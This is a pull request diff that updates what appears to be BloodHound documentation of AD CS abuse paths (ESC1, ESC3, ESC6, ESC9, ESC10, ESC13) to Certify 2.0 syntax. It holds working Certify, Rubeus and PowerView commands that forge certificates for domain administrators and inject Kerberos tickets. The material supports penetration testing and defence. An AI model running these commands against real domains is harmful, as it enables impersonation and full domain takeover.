### PR TITLE
Update abuse info to Certify 2.0

### DIFF
--- a/docs/resources/edges/adcs-esc1.mdx
+++ b/docs/resources/edges/adcs-esc1.mdx
@@ -62,7 +62,7 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 
 ### Abuse and Opsec references
 
-* [Certipy](https://github.com/ly4k/Ce)
+* [Certipy](https://github.com/ly4k/Certipy)
 * [Rubeus](https://github.com/GhostPack/Rubeus)
 * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)
 * [https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#misconfigured-certificate-templates-esc1](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#misconfigured-certificate-templates-esc1)

--- a/docs/resources/edges/adcs-esc1.mdx
+++ b/docs/resources/edges/adcs-esc1.mdx
@@ -12,30 +12,24 @@ This enterprise CA is trusted for NT authentication in the forest, along with th
 
 ### Windows
 
-Step 1: Use Certify to request enrollment in the affected template, specifying the affected
-certification authority and target principal to impersonate:
+Step 1: Use Certify (2.0) to request enrollment in the affected template, specifying the affected certification authority and target principal to impersonate:
 
 ```bash
-Certify.exe request /ca:rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA /template:"ESC1" /altname:ForestRootDA /sid:S-1-5-21-2697957641-2271029196-387917394-500
+Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC1 --upn ForestRootDA --sid S-1-5-21-2697957641-2271029196-387917394-500
 ```
 
-Step 2: Convert the emitted certificate to PFX format:
+The issued certificate (PFX) is printed to the console in base64 form. Copy the full base64 blob (including BEGIN/END lines) for the next step.
+
+Step 2: With Rubeus, use the base64-encoded certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
 ```bash
-certutil.exe -MergePFX .\cert.pem .\cert.pfx
+Rubeus asktgt /user:ForestRootDA /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
-Step 3: Optionally purge all Kerberos tickets from memory:
+Step 3 (optional): Verify the TGT by listing it with klist:
 
 ```bash
-klist purge
-```
-
-Step 4: Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the
-target identity to impersonate and the PFX-formatted certificate created in Step 2:
-
-```bash
-Rubeus asktgt /user:forestrootda /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt
+klist
 ```
 
 ### Linux
@@ -69,7 +63,7 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 ### Abuse and Opsec references
 
 * [Certipy](https://github.com/ly4k/Ce)
-* [Rubeus](https://github.com/GhostPack/R)
+* [Rubeus](https://github.com/GhostPack/Rubeus)
 * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)
 * [https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#misconfigured-certificate-templates-esc1](https://book.hacktricks.xyz/windows-hardening/active-directory-methodology/ad-certificates/domain-escalation#misconfigured-certificate-templates-esc1)
 * https://hideandsec.sh/books/cheatsheets-82c/page/active-directory-certificate-ser

--- a/docs/resources/edges/adcs-esc1.mdx
+++ b/docs/resources/edges/adcs-esc1.mdx
@@ -14,7 +14,7 @@ This enterprise CA is trusted for NT authentication in the forest, along with th
 
 Step 1: Use Certify (2.0) to request enrollment in the affected template, specifying the affected certification authority and target principal to impersonate:
 
-```bash
+```cmd
 Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC1 --upn ForestRootDA --sid S-1-5-21-2697957641-2271029196-387917394-500
 ```
 
@@ -22,13 +22,13 @@ The issued certificate (PFX) is printed to the console in base64 form. Copy the 
 
 Step 2: With Rubeus, use the base64-encoded certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
-```bash
+```cmd
 Rubeus asktgt /user:ForestRootDA /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
 Step 3 (optional): Verify the TGT by listing it with klist:
 
-```bash
+```cmd
 klist
 ```
 

--- a/docs/resources/edges/adcs-esc10a.mdx
+++ b/docs/resources/edges/adcs-esc10a.mdx
@@ -54,7 +54,7 @@ principal why it can be set to any arbitrary string.
 
 Check if the victim has the mail attribute set using PowerView:
 
-```bash
+```PowerShell
 Get-DomainObject -Identity VICTIM -Properties mail
 ```
 
@@ -62,7 +62,7 @@ If the victim has the mail attribute set, continue to Step 4.
 
 If the victim does not has the mail attribute set, set it to a dummy mail using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'mail'='dummy@mail.com'}
 ```
 

--- a/docs/resources/edges/adcs-esc10a.mdx
+++ b/docs/resources/edges/adcs-esc10a.mdx
@@ -185,7 +185,7 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 
 ### Abuse and Opsec references
 
-* [Certipy](https://github.com/ly4k/Ce)
+* [Certipy](https://github.com/ly4k/Certipy)
 * [Certipy 4.0](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
 * [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject)
 * [LDAPSearch](https://linux.die.net/man/1/ldapsearch)

--- a/docs/resources/edges/adcs-esc10b.mdx
+++ b/docs/resources/edges/adcs-esc10b.mdx
@@ -191,7 +191,7 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 
 ### Abuse and Opsec references
 
-* [Certipy](https://github.com/ly4k/Ce)
+* [Certipy](https://github.com/ly4k/Certipy)
 * [Certipy 4.0](https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7)
 * [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject)
 * [LDAPSearch](https://linux.die.net/man/1/ldapsearch)

--- a/docs/resources/edges/adcs-esc10b.mdx
+++ b/docs/resources/edges/adcs-esc10b.mdx
@@ -21,7 +21,7 @@ The SPNs of the victim will be automatically updated when you change the `dNSHos
 
 Set SPN of the victim computer using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
 ```
 
@@ -56,14 +56,14 @@ principal why it can be set to any arbitrary string.
 
 Check if the victim has the mail attribute set using PowerView:
 
-```bash
+```PowerShell
 Get-DomainObject -Identity VICTIM -Properties mail
 ```
 If the victim has the mail attribute set, continue to Step 5.
 
 If the victim does not has the mail attribute set, set it to a dummy mail using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'mail'='dummy@mail.com'}
 ```
 Step 5: Obtain a session as victim.  There are several options for this step.
@@ -87,7 +87,7 @@ To avoid issues in the environment, set the `dNSHostName` and SPN of the victim 
 ```bash
 Certipy.exe account update -u ATTACKER@CORP.LOCAL -p PWD -user VICTIM$ -dns VICTIM.CORP.LOCAL
 ```
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
 ```
 

--- a/docs/resources/edges/adcs-esc13.mdx
+++ b/docs/resources/edges/adcs-esc13.mdx
@@ -16,7 +16,7 @@ An attacker may perform this attack in the following steps:
 
 On Windows, use Certify (2.0) to request enrollment in the affected template, specifying the affected certification authority:
 
-```bash
+```cmd
 Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC13
 ```
 
@@ -35,7 +35,7 @@ The certificate PFX is printed to the console in a base64-encoded format.
 
 On Windows, use Rubeus to request a TGT from the domain, specifying the attacker identity and the base64-encoded certificate from Step 1:
 
-```bash
+```cmd
 Rubeus asktgt /user:attacker /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 

--- a/docs/resources/edges/adcs-esc13.mdx
+++ b/docs/resources/edges/adcs-esc13.mdx
@@ -14,10 +14,10 @@ An attacker may perform this attack in the following steps:
 
 ### Step 1: Request enrollment in the affected template
 
-On Windows, use Certify to request enrollment in the affected template, specifying the affected certification authority:
+On Windows, use Certify (2.0) to request enrollment in the affected template, specifying the affected certification authority:
 
 ```bash
-Certify.exe request /ca:rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA /template:"ESC13"
+Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC13
 ```
 
 On Linux, use Certipy to request enrollment in the affected template, specifying the affected enterprise CA:
@@ -29,22 +29,14 @@ certipy req -u john@corp.local -p Passw0rd -ca corp-DC-CA -target ca.corp.local 
 
 If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. The 'mail' attribute can be set on both user and computer objects but the 'dNSHostName' attribute can only be set on computer objects. Computers have validated write permission to their own 'dNSHostName' attribute by default, but neither users nor computers can write to their own 'mail' attribute by default.
 
-### Step 2: Create PFX format of certificate (Windows only)
+The certificate PFX is printed to the console in a base64-encoded format.
 
-Save the certificate as cert.pem and the private key as cert.key.
+### Step 2: Request a ticket granting ticket (TGT)
 
-Convert the emitted certificate to PFX format:
-
-```bash
-certutil.exe -MergePFX .\cert.pem .\cert.pfx
-```
-
-### Step 3: Request a ticket granting ticket (TGT)
-
-On Windows, use Rubeus to request a TGT from the domain, specifying the attacker identity, the PFX-formatted certificate created in Step 2, and the certificate password:
+On Windows, use Rubeus to request a TGT from the domain, specifying the attacker identity and the base64-encoded certificate from Step 1:
 
 ```bash
-Rubeus asktgt /user:attacker /domain:forestroot.com /certificate:cert.pfx /password:asdf /ptt
+Rubeus asktgt /user:attacker /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
 On Linux, use Certipy to request a TGT from the domain, specifying the certificate created in Step 1 and the IP of a domain controller:

--- a/docs/resources/edges/adcs-esc3.mdx
+++ b/docs/resources/edges/adcs-esc3.mdx
@@ -19,34 +19,27 @@ target user or computer is protected by enrollment agent restrictions on the ent
 
 ### Windows
 
-Step 1: Use Certify to request an enrollment agent certificate.
+Step 1: Use Certify (2.0) to request an enrollment agent certificate.
 
 ```bash
-Certify.exe request /ca:CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA /template:Vuln-EnrollmentAgent
+Certify.exe request --ca CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA --template Vuln-EnrollmentAgent
 ```
 If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. The 'mail' attribute can be set on both user and computer objects but the 'dNSHostName' attribute can only be set on computer objects. Computers have validated write permission to their own 'dNSHostName' attribute by default, but neither users nor computers can write to their own 'mail' attribute by default.
 
-Step 2: Convert the emitted certificate to PFX format.
+Step 2: Use the enrollment agent certificate to issue a certificate request on behalf of another user to a certificate template that allows for authentication and permits enrollment agent enrollment.
 
 ```bash
-certutil.exe -MergePFX .\enrollmentcert.pem .\enrollmentcert.pfx
+Certify.exe request-agent --ca ca01.corp.local\CORP-CA01-CA --template User --target itadmin --agent-pfx <agent cert base64>
 ```
-Step 3: Use the enrollment agent certificate to issue a certificate request on behalf of another user to a certificate template that allow for authentication and permit enrollment agent enrollment.
+
+If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the target principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. Choose another target with the given attribute set.
+
+The certificate PFX is printed to the console in a base64-encoded format.
+
+Step 3: With Rubeus, use the issued certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
 ```bash
-Certify.exe request /ca:CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA /template:User /onbehalfof:CORP\itadmin /enrollcert:enrollmentcert.pfx
-```
-Save the certificate as itadminenrollment.pem and the private key as itadminenrollment.key. If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the target principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. Choose another target with the given attribute set.
-
-Step 4: Convert the emitted certificate to PFX format.
-
-```bash
-certutil.exe -MergePFX .\itadminenrollment.pem .\itadminenrollment.pfx
-```
-Step 5: Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity to impersonate and the PFX-formatted certificate created in Step 4.
-
-```bash
-Rubeus.exe asktgt /user:itadmin /domain:corp.local /certificate:itadminenrollment.pfx
+Rubeus.exe asktgt /user:itadmin /domain:corp.local /certificate:<cert base64> /ptt
 ```
 ### Linux
 

--- a/docs/resources/edges/adcs-esc3.mdx
+++ b/docs/resources/edges/adcs-esc3.mdx
@@ -21,14 +21,14 @@ target user or computer is protected by enrollment agent restrictions on the ent
 
 Step 1: Use Certify (2.0) to request an enrollment agent certificate.
 
-```bash
+```cmd
 Certify.exe request --ca CORPDC01.CORP.LOCAL\CORP-CORPDC01-CA --template Vuln-EnrollmentAgent
 ```
 If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. The 'mail' attribute can be set on both user and computer objects but the 'dNSHostName' attribute can only be set on computer objects. Computers have validated write permission to their own 'dNSHostName' attribute by default, but neither users nor computers can write to their own 'mail' attribute by default.
 
 Step 2: Use the enrollment agent certificate to issue a certificate request on behalf of another user to a certificate template that allows for authentication and permits enrollment agent enrollment.
 
-```bash
+```cmd
 Certify.exe request-agent --ca ca01.corp.local\CORP-CA01-CA --template User --target itadmin --agent-pfx <agent cert base64>
 ```
 
@@ -38,7 +38,7 @@ The certificate PFX is printed to the console in a base64-encoded format.
 
 Step 3: With Rubeus, use the issued certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
-```bash
+```cmd
 Rubeus.exe asktgt /user:itadmin /domain:corp.local /certificate:<cert base64> /ptt
 ```
 ### Linux

--- a/docs/resources/edges/adcs-esc3.mdx
+++ b/docs/resources/edges/adcs-esc3.mdx
@@ -78,7 +78,7 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 
 ### Abuse and Opsec references
 
-* [Certipy](https://github.com/ly4k/Ce)
+* [Certipy](https://github.com/ly4k/Certipy)
 * [Certify](https://github.com/GhostPack/Certify)
 * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)
 * [https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-cersod/97f47d4c-2901-41fa-9616-96b94e1b5435](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-cersod/97f47d4c-2901-41fa-9616-96b94e1b5435)

--- a/docs/resources/edges/adcs-esc6a.mdx
+++ b/docs/resources/edges/adcs-esc6a.mdx
@@ -18,28 +18,23 @@ knowing their credentials.
 
 ### Windows
 
-Step 1: Use Certify to request enrollment in the affected template, specifying the affected
-certification authority and target principal to impersonate:
+Step 1: Use Certify (2.0) to request enrollment in the affected template, specifying the affected enterprise CA and target principal to impersonate (include the SID URL if strong mapping is enforced):
 
 ```bash
-.\Certify.exe request /ca:rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA /template:ESC6 /altname:ForestRootDA /url:"tag:microsoft.com,2022-09-14:sid:S-1-5-21-2697957641-2271029196-387917394-500"
+Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC6 --upn ForestRootDA --sid-url S-1-5-21-2697957641-2271029196-387917394-500
 ```
+
+The certificate PFX is printed to the console in a base64-encoded format.
 
 If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. The 'mail' attribute can be set on both user and computer objects but the 'dNSHostName' attribute can only be set on computer objects. Computers have validated write permission to their own 'dNSHostName' attribute by default, but neither users nor computers can write to their own 'mail' attribute by default.
 
-Step 2: Convert the emitted certificate to PFX format:
+Step 2: With Rubeus, use the certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
 ```bash
-certutil.exe -MergePFX .\cert.pem .\cert.pfx
+Rubeus asktgt /user:ForestRootDA /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
-Step 3: Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the
-target identity to impersonate and the PFX-formatted certificate created in Step 2:
-
-```bash
-.\Rubeus.exe asktgt /certificate:cert.pfx /user:forestrootda /domain:forestroot.com /ptt
-```
-Step 4: Optionally verify the TGT by listing it with the klist command:
+Step 3 (optional): Verify the TGT by listing it with klist:
 
 ```bash
 klist

--- a/docs/resources/edges/adcs-esc6a.mdx
+++ b/docs/resources/edges/adcs-esc6a.mdx
@@ -20,7 +20,7 @@ knowing their credentials.
 
 Step 1: Use Certify (2.0) to request enrollment in the affected template, specifying the affected enterprise CA and target principal to impersonate (include the SID URL if strong mapping is enforced):
 
-```bash
+```cmd
 Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC6 --upn ForestRootDA --sid-url S-1-5-21-2697957641-2271029196-387917394-500
 ```
 
@@ -30,13 +30,13 @@ If the enrollment fails with an error message stating that the Email or DNS name
 
 Step 2: With Rubeus, use the certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
-```bash
+```cmd
 Rubeus asktgt /user:ForestRootDA /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
 Step 3 (optional): Verify the TGT by listing it with klist:
 
-```bash
+```cmd
 klist
 ```
 
@@ -46,7 +46,7 @@ Step 1: Use Certipy to request enrollment in the affected template, specifying t
 certification authority and target principal to impersonate:
 
 ```bash
-'certipy req -u john@corp.local -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC6 -upn administrator@corp.local
+certipy req -u john@corp.local -p Passw0rd -ca corp-DC-CA -target ca.corp.local -template ESC6 -upn administrator@corp.local
 ```
 
 If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. The 'mail' attribute can be set on both user and computer objects but the 'dNSHostName' attribute can only be set on computer objects. Computers have validated write permission to their own 'dNSHostName' attribute by default, but neither users nor computers can write to their own 'mail' attribute by default.

--- a/docs/resources/edges/adcs-esc6b.mdx
+++ b/docs/resources/edges/adcs-esc6b.mdx
@@ -16,7 +16,7 @@ They also have enrollment permission for an enterprise CA with the necessary tem
 
 Step 1: Use Certify (2.0) to request enrollment in the affected template, specifying the affected certification authority and target principal to impersonate:
 
-```bash
+```cmd
 Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC6 --upn ForestRootDA
 ```
 
@@ -26,13 +26,13 @@ If the enrollment fails with an error message stating that the Email or DNS name
 
 Step 2: With Rubeus, use the certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
-```bash
+```cmd
 Rubeus asktgt /user:ForestRootDA /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
 Step 3 (optional): Verify the TGT by listing it with klist:
 
-```bash
+```cmd
 klist
 ```
 

--- a/docs/resources/edges/adcs-esc6b.mdx
+++ b/docs/resources/edges/adcs-esc6b.mdx
@@ -14,27 +14,23 @@ They also have enrollment permission for an enterprise CA with the necessary tem
 
 ### Windows
 
-Step 1: Use Certify to request enrollment in the affected template, specifying the affected certification authority and target principal to impersonate:
+Step 1: Use Certify (2.0) to request enrollment in the affected template, specifying the affected certification authority and target principal to impersonate:
 
 ```bash
-.\Certify.exe request /ca:rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA /template:ESC6 /altname:ForestRootDA
+Certify.exe request --ca rootdomaindc.forestroot.com\forestroot-RootDomainDC-CA --template ESC6 --upn ForestRootDA
 ```
+
+The certificate PFX is printed to the console in a base64-encoded format.
 
 If the enrollment fails with an error message stating that the Email or DNS name is unavailable and cannot be added to the Subject or Subject Alternate name, then it is because the enrollee principal does not have their 'mail' or 'dNSHostName' attribute set, which is required by the certificate template. The 'mail' attribute can be set on both user and computer objects but the 'dNSHostName' attribute can only be set on computer objects. Computers have validated write permission to their own 'dNSHostName' attribute by default, but neither users nor computers can write to their own 'mail' attribute by default.
 
-Step 2: Convert the emitted certificate to PFX format:
+Step 2: With Rubeus, use the certificate to authenticate to the domain and request a TGT, specifying the identity you intend to impersonate:
 
 ```bash
-certutil.exe -MergePFX .\cert.pem .\cert.pfx
-```
-Step 3: Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the
-target identity to impersonate and the PFX-formatted certificate created in Step 2:
-
-```bash
-.\Rubeus.exe asktgt /certificate:cert.pfx /user:forestrootda /domain:forestroot.com /ptt
+Rubeus asktgt /user:ForestRootDA /domain:forestroot.com /certificate:<cert base64> /ptt
 ```
 
-Step 4: Optionally verify the TGT by listing it with the klist command:
+Step 3 (optional): Verify the TGT by listing it with klist:
 
 ```bash
 klist

--- a/docs/resources/edges/adcs-esc9a.mdx
+++ b/docs/resources/edges/adcs-esc9a.mdx
@@ -158,10 +158,9 @@ This edge is related to the following MITRE ATT&CK tactic and techniques:
 
 * Certipy 4.0
 * [Certipy](https://github.com/ly4k/Certipy)
-* [GhostPack Certipy](https://github.com/GhostPack/Certify)
+* [GhostPack Certify](https://github.com/GhostPack/Certify)
 * [GhostPack Rubeus](https://github.com/GhostPack/Rubeus)
 * [Set-DomainObject](https://powersploit.readthedocs.io/en/latest/Recon/Set-DomainObject)
-* [CertUtil.exe](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/certutil)
 * [LDAPSearch](https://linux.die.net/man/1/ldapsearch)
 * [LDAPModify](https://linux.die.net/man/1/ldapmodify)
 * [https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf](https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf)

--- a/docs/resources/edges/adcs-esc9a.mdx
+++ b/docs/resources/edges/adcs-esc9a.mdx
@@ -55,19 +55,14 @@ If the victim is a user, you have the following options for obtaining the creden
 
 Step 4: Enroll certificate as victim.
 
-Use Certify as the victim principal to request enrollment in the affected template, specifying the affected EnterpriseCA:
+Use Certify (2.0) as the victim principal to request enrollment in the affected template, specifying the affected EnterpriseCA:
 
 ```bash
-Certify.exe request /ca:SERVER\CA-NAME /template:TEMPLATE
+Certify.exe request --ca SERVER\CA-NAME --template TEMPLATE
 ```
-Save the certificate as `cert.pem` and the private key as `cert.key`.
+The certificate PFX is printed to the console in a base64-encoded format.
 
-Step 5: Convert the emitted certificate to PFX format:
-
-```bash
-certutil.exe -MergePFX .\cert.pem .\cert.pfx
-```
-Step 6: Set UPN of victim to arbitrary value.
+Step 5: Set UPN of victim to arbitrary value.
 
 Set the UPN of the victim principal using PowerView:
 
@@ -75,13 +70,12 @@ Set the UPN of the victim principal using PowerView:
 Set-DomainObject -Identity VICTIM -Set @{'userprincipalname'='victim@corp.local'}
 ```
 
-Step 7: Perform Kerberos authentication as targeted principal against affected DC using certificate.
+Step 6: Perform Kerberos authentication as targeted principal against affected DC using certificate.
 
-Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the
-target identity to impersonate and the PFX-formatted certificate created in Step 5:
+Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity to impersonate and the base64-encoded PFX obtained in Step 4:
 
 ```bash
-.\Rubeus.exe asktgt /certificate:cert.pfx /user:forestrootda /domain:forestroot.com /ptt
+Rubeus.exe asktgt /certificate:<cert base64> /user:forestrootda /domain:forestroot.com /ptt
 ```
 
 ### Linux

--- a/docs/resources/edges/adcs-esc9a.mdx
+++ b/docs/resources/edges/adcs-esc9a.mdx
@@ -14,7 +14,7 @@ The victim also has enrollment permission for an enterprise CA with the necessar
 
 Step 1: Set UPN of victim to targeted principal's `sAMAccountName`. Set the UPN of the victim principal using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'userprincipalname'='Target'}
 ```
 Step 2: Check if the 'mail' attribute of victim must be set and set it if required.
@@ -30,14 +30,14 @@ principal why it can be set to any arbitrary string.
 
 Check if the victim has the mail attribute set using PowerView:
 
-```bash
+```PowerShell
 Get-DomainObject -Identity VICTIM -Properties mail
 ```
 If the victim has the mail attribute set, continue to Step 3.
 
 If the victim does not has the mail attribute set, set it to a dummy mail using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'mail'='dummy@mail.com'}
 ```
 Step 3: Obtain a session as victim. There are several options for this step.
@@ -57,7 +57,7 @@ Step 4: Enroll certificate as victim.
 
 Use Certify (2.0) as the victim principal to request enrollment in the affected template, specifying the affected EnterpriseCA:
 
-```bash
+```cmd
 Certify.exe request --ca SERVER\CA-NAME --template TEMPLATE
 ```
 The certificate PFX is printed to the console in a base64-encoded format.
@@ -66,7 +66,7 @@ Step 5: Set UPN of victim to arbitrary value.
 
 Set the UPN of the victim principal using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'userprincipalname'='victim@corp.local'}
 ```
 
@@ -74,7 +74,7 @@ Step 6: Perform Kerberos authentication as targeted principal against affected D
 
 Use Rubeus to request a ticket granting ticket (TGT) from the domain, specifying the target identity to impersonate and the base64-encoded PFX obtained in Step 4:
 
-```bash
+```cmd
 Rubeus.exe asktgt /certificate:<cert base64> /user:forestrootda /domain:forestroot.com /ptt
 ```
 

--- a/docs/resources/edges/adcs-esc9b.mdx
+++ b/docs/resources/edges/adcs-esc9b.mdx
@@ -62,19 +62,14 @@ There are several options for this step. You can obtain a session as SYSTEM on t
 
 Step 5: Enroll certificate as victim.
 
-Use Certify as the victim computer to request enrollment in the affected template, specifying the affected EnterpriseCA:
+Use Certify (2.0) as the victim computer to request enrollment in the affected template, specifying the affected EnterpriseCA:
 
 ```bash
-Certify.exe request /ca:SERVERCA-NAME /template:TEMPLATE /machine
+Certify.exe request --ca SERVER\CA-NAME --template TEMPLATE --machine
 ```
-Save the certificate as `cert.pem` and the private key as `cert.key`.
+The certificate PFX is printed to the console in a base64-encoded format.
 
-Step 6: Convert the emitted certificate to PFX format:
-
-```bash
-certutil.exe -MergePFX .\cert.pem .\cert.pfx
-```
-Step 7 (optional): Set `dNSHostName` and SPN of victim to the previous values.
+Step 6 (optional): Set `dNSHostName` and SPN of victim to the previous values.
 
 To avoid issues in the environment, set the `dNSHostName` and SPN of the victim computer back to its previous values using PowerView:
 
@@ -85,13 +80,12 @@ Set-DomainObject -Identity VICTIM -Set @{'dnshostname'='victim.corp.local'}
 Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
 ```
 
-Step 8: Perform Kerberos authentication as targeted computer against affected DC using certificate.
+Step 7: Perform Kerberos authentication as targeted computer against affected DC using certificate.
 
-Use Rubeus to request a ticket granting ticket (TGT) from an affected DC, specifying the
-target identity to impersonate and the PFX-formatted certificate created in Step 6:
+Use Rubeus to request a ticket granting ticket (TGT) from an affected DC, specifying the target identity to impersonate and the base64-encoded certificate obtained in Step 5:
 
 ```bash
-Rubeus.exe asktgt /certificate:cert.pfx /user:TARGET$ /domain:DOMAIN /dc:DOMAIN_CONTROLLER
+Rubeus.exe asktgt /certificate:<cert base64> /user:TARGET$ /domain:DOMAIN /dc:DOMAIN_CONTROLLER
 ```
 
 ### Linux

--- a/docs/resources/edges/adcs-esc9b.mdx
+++ b/docs/resources/edges/adcs-esc9b.mdx
@@ -21,7 +21,7 @@ The SPNs of the victim will be automatically updated when you change the `dNSHos
 
 Set SPN of the victim computer using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
 ```
 
@@ -29,7 +29,7 @@ Step 2: Set `dNSHostName` of victim computer to targeted computer's `dNSHostName
 
 Set the `dNSHostName` of the victim computer using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'dnshostname'='target.corp.local'}
 ```
 Step 3: Check if the 'mail' attribute of victim must be set and set it if required.
@@ -45,7 +45,7 @@ principal why it can be set to any arbitrary string.
 
 Check if the victim has the mail attribute set using PowerView:
 
-```bash
+```PowerShell
 Get-DomainObject -Identity VICTIM -Properties mail
 ```
 
@@ -53,7 +53,7 @@ If the victim has the mail attribute set, continue to Step 4.
 
 If the victim does not has the mail attribute set, set it to a dummy mail using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'mail'='dummy@mail.com'}
 ```
 Step 4: Obtain a session as victim.
@@ -64,7 +64,7 @@ Step 5: Enroll certificate as victim.
 
 Use Certify (2.0) as the victim computer to request enrollment in the affected template, specifying the affected EnterpriseCA:
 
-```bash
+```cmd
 Certify.exe request --ca SERVER\CA-NAME --template TEMPLATE --machine
 ```
 The certificate PFX is printed to the console in a base64-encoded format.
@@ -73,10 +73,10 @@ Step 6 (optional): Set `dNSHostName` and SPN of victim to the previous values.
 
 To avoid issues in the environment, set the `dNSHostName` and SPN of the victim computer back to its previous values using PowerView:
 
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'dnshostname'='victim.corp.local'}
 ```
-```bash
+```PowerShell
 Set-DomainObject -Identity VICTIM -Set @{'serviceprincipalname'='HOST/victim'}
 ```
 
@@ -84,7 +84,7 @@ Step 7: Perform Kerberos authentication as targeted computer against affected DC
 
 Use Rubeus to request a ticket granting ticket (TGT) from an affected DC, specifying the target identity to impersonate and the base64-encoded certificate obtained in Step 5:
 
-```bash
+```cmd
